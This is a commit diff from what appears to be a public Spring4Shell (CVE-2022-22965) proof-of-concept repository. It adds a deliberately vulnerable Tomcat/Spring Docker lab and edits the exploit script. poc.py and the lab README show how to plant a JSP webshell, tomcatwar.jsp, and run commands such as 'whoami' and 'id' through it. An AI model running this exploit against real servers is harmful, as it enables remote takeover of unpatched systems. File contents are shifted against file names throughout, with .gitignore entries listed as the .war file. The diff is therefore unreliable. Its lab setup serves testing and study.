Added an example venerable tomcat setup

Author: BobTheShoplifter

README.md

@@ -1,23 +1,35 @@
 # Spring4Shell-POC (CVE-2022-22965)
+
 ![spring4shell](spring4shell.png)
 
-Spring4Shell (CVE-2022-22965) Proof Of Concept/Information
+Spring4Shell (CVE-2022-22965) Proof Of Concept/Information + A vulnerable Tomcat server with a vulnerable spring4shell application.
 
 Early this morning, multiple sources has informed of a possible RCE exploit in the popular java framework spring.
 
-The naming of this flaw is based on the similarities to the infamous Log4j LOG4Shell. 
-## Details
+The naming of this flaw is based on the similarities to the infamous Log4j LOG4Shell.
+
+## Details about this vulnerability
+
+- [https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)
+- [https://bugalert.org/content/notices/2022-03-29-spring.html](https://bugalert.org/content/notices/2022-03-29-spring.html)
+- [https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc](https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc)
+- [https://www.springcloud.io/post/2022-03/spring-0day-vulnerability](https://www.springcloud.io/post/2022-03/spring-0day-vulnerability)
+- [https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)
+
+## Vulnerable Tomcat server
+
+I have now made a docker image for this, which includes a vulnerable spring + tomcat application.
 
-* [https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)
-* [https://bugalert.org/content/notices/2022-03-29-spring.html](https://bugalert.org/content/notices/2022-03-29-spring.html)
-* [https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc](https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc)
-* [https://www.springcloud.io/post/2022-03/spring-0day-vulnerability](https://www.springcloud.io/post/2022-03/spring-0day-vulnerability)
-* [https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)
+The application should be enough to test this vulnerability.
+
+[Please see (vulnerable-tomcat/README.md)](vulnerable-tomcat/README.md)
 
 ## Requirements
-* Python3 Or Docker
 
-## Usage:
+- Python3 Or Docker
+
+## Usage
+
 ```python
 pip install -r requirements.txt
 poc.py --help
@@ -32,24 +44,6 @@ docker run ghcr.io/bobtheshoplifter/spring4shell-poc:main --url https://example.
 
 ![image](https://user-images.githubusercontent.com/22559547/161400099-fb6c4f02-9d48-457a-8c91-041a9a8438b7.png)
 
-
-
-## Poc
-
-Found intresting poc here : https://github.com/craig/SpringCore0day/blob/main/exp.py [^1]. & https://twitter.com/vxunderground/status/1509170582469943303
-
-https://github.com/reznok/Spring4Shell-POC - Docker, POC
-
-* clone sample repo from https://spring.io/guides/gs/handling-form-submission/
-* you can skip right to the gs-handling-form-submission/complete directory, no need to follow the tutorial
-* modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy). build war file :)
-* install tomcat9 + java 11 (i did it on ubuntu 20.04 via apt-get)
-* deploy the war file
-* update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT
-* run PoC (ignore the URL it gives you for the webshell): python3 exp.py --url http://your.ip.here:8080/handling-form-submission-complete/greeting
-* you should see the "tomcatwar.jsp" file now in webapps/handling-form-submission
-* hit http://your.ip.here:8080/handling-form-submission/tomcatwar.jsp?pwd=j&cmd=id to see the results
-
 ## Mitigations
 
 !!(The following mitigations are only theoretical as nothing has been confirmed)!!
@@ -59,6 +53,7 @@ https://github.com/reznok/Spring4Shell-POC - Docker, POC
 Cyberkendra informed that JDK versions lower than JDK 9
 
 You can easily check this by running
+
 ```sh
 java -version
 ```
@@ -77,13 +72,10 @@ The following article will be updated
 
 ### Check if you are using the spring framework
 
-Do a global search after "spring-beans-*.jar" and "spring*.jar"
+Do a global search after "spring-beans-_.jar" and "spring_.jar"
 
 ```sh
 find . -name spring-beans*.jar
 ```
 
-
-WIP :=)
-
 [^1]: POC, translated fron this repository.

poc.py

@@ -10,6 +10,7 @@
 from urllib.parse import urljoin,urlparse
 from threading import Thread
 from sys import exit
+import time
 
 
 class Exploit(Thread):
@@ -37,14 +38,15 @@ def run(self):
                           timeout=15,
                           allow_redirects=False,
                           verify=False)
+            time.sleep(10) ## Wait for the upload to complete
             shellurl = urljoin(self.url, 'tomcatwar.jsp')
             shellgo = requests.get(shellurl,
                                    timeout=15,
                                    allow_redirects=False,
                                    stream=True,
                                    verify=False)
             if shellgo.status_code == 200:
-                print(f"Vulnerable，shell ip:{shellurl}?pwd=j&cmd=whoami")
+                print(f"Vulnerable，shell url: {shellurl}?pwd=j&cmd=whoami")
 
             ## Depending on the server, the shell url may be in tomcats root folder
             else:
@@ -57,7 +59,7 @@ def run(self):
                                    stream=True,
                                    verify=False)
                 if shellgoroot.status_code == 200: 
-                    print(f"Vulnerable，shell ip:{shellurlroot}?pwd=j&cmd=whoami")
+                    print(f"Vulnerable，shell url: {shellurlroot}?pwd=j&cmd=whoami")
                 else:
                     print(f"\033[91m[" + '\u2718' + "]\033[0m", self.url,
                         "\033[91mNot Vulnerable!\033[0m ")

vulnerable-tomcat/Dockerfile

@@ -0,0 +1,7 @@
+FROM tomcat:9.0.60-jre11-openjdk-slim-buster
+
+ADD spring-form.war /usr/local/tomcat/webapps/
+
+EXPOSE 8888
+
+CMD ["catalina.sh", "run"]

vulnerable-tomcat/README.md

@@ -0,0 +1,64 @@
+# Example of a spring4shell vulnerable Tomcat application
+
+![spring4shellapplication](spring4shellapplication.png)
+
+## Example (Docker)
+
+An example of a vulnerable Tomcat application + server.
+
+War files built from /spring-war folder. (It is recommended to build your own war files but i have provided one based on <https://spring.io/guides/gs/handling-form-submission/>)
+
+### Build
+
+Building the docker version of the vunurable application, you can build your own war files.
+
+### Building your own war file
+
+You can use the provided spring-form.war or build your own
+
+#### Prerequisites (Only if building your own war files)
+
+- Java
+- Java JDK (I have only tested with JDK 18)
+- [Maven](https://maven.apache.org/install.html)
+
+```sh
+cd spring-war
+mvn clean package
+cd target
+mv spring-form.war ../../ # Linux move the war file to vunerable-tomcat
+move spring-form.war ../../ # Windows
+cd ../../
+```
+
+### Building and starting the docker container
+
+```sh
+docker build -t vulnerable-tomcat .
+docker run -it --rm -p 8888:8080 vulnerable-tomcat
+```
+
+Wait about 20 seconds for the server to start. Then run the exploit script.
+
+```sh
+python3 poc.py --url http://<dockerip>:8888/spring-form/greeting
+#or docker variant
+docker pull ghcr.io/bobtheshoplifter/spring4shell-poc:main
+docker run ghcr.io/bobtheshoplifter/spring4shell-poc:main --url http://<dockerip>:8888/spring-form/greeting
+```
+
+## Example (Manual/Old)
+
+Found intresting poc here : <https://github.com/craig/SpringCore0day/blob/main/exp.py> [^1]. & <https://twitter.com/vxunderground/status/1509170582469943303>
+
+<https://github.com/reznok/Spring4Shell-POC> - Docker, POC
+
+- clone sample repo from <https://spring.io/guides/gs/handling-form-submission/>
+- you can skip right to the gs-handling-form-submission/complete directory, no need to follow the tutorial
+- modify it so that you can build a war file (<https://www.baeldung.com/spring-boot-war-tomcat-deploy>). build war file :)
+- install tomcat9 + java 11 (i did it on ubuntu 20.04 via apt-get)
+- deploy the war file
+- update the PoC (<https://share.vx-underground.org/>) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT
+- run PoC (ignore the URL it gives you for the webshell): python3 exp.py --url <http://your.ip.here:8080/handling-form-submission-complete/greeting>
+- you should see the "tomcatwar.jsp" file now in webapps/handling-form-submission
+- hit <http://your.ip.here:8080/handling-form-submission/tomcatwar.jsp?pwd=j&cmd=id> to see the results

vulnerable-tomcat/spring-form.war

@@ -0,0 +1,12 @@
+target/
+pom.xml.tag
+pom.xml.releaseBackup
+pom.xml.versionsBackup
+pom.xml.next
+release.properties
+dependency-reduced-pom.xml
+buildNumber.properties
+.mvn/timing.properties
+# https://github.com/takari/maven-wrapper#usage-without-binary-jar
+.mvn/wrapper/maven-wrapper.jar
+gradle/wrapper/gradle-wrapper.jar

vulnerable-tomcat/spring-war/.gitignore

@@ -0,0 +1,2 @@
+distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.6.3/apache-maven-3.6.3-bin.zip
+wrapperUrl=https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.tar.gz

vulnerable-tomcat/spring-war/.mvn/wrapper/maven-wrapper.properties

@@ -0,0 +1,23 @@
+plugins {
+	id 'org.springframework.boot' version '2.6.3'
+	id 'io.spring.dependency-management' version '1.0.11.RELEASE'
+	id 'java'
+}
+
+group = 'com.example'
+version = '0.0.1-SNAPSHOT'
+sourceCompatibility = '1.8'
+
+repositories {
+	mavenCentral()
+}
+
+dependencies {
+	implementation 'org.springframework.boot:spring-boot-starter-thymeleaf'
+	implementation 'org.springframework.boot:spring-boot-starter-web'
+	testImplementation 'org.springframework.boot:spring-boot-starter-test'
+}
+
+test {
+	useJUnitPlatform()
+}

vulnerable-tomcat/spring-war/build.gradle

@@ -0,0 +1,5 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-7.1-bin.zip
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists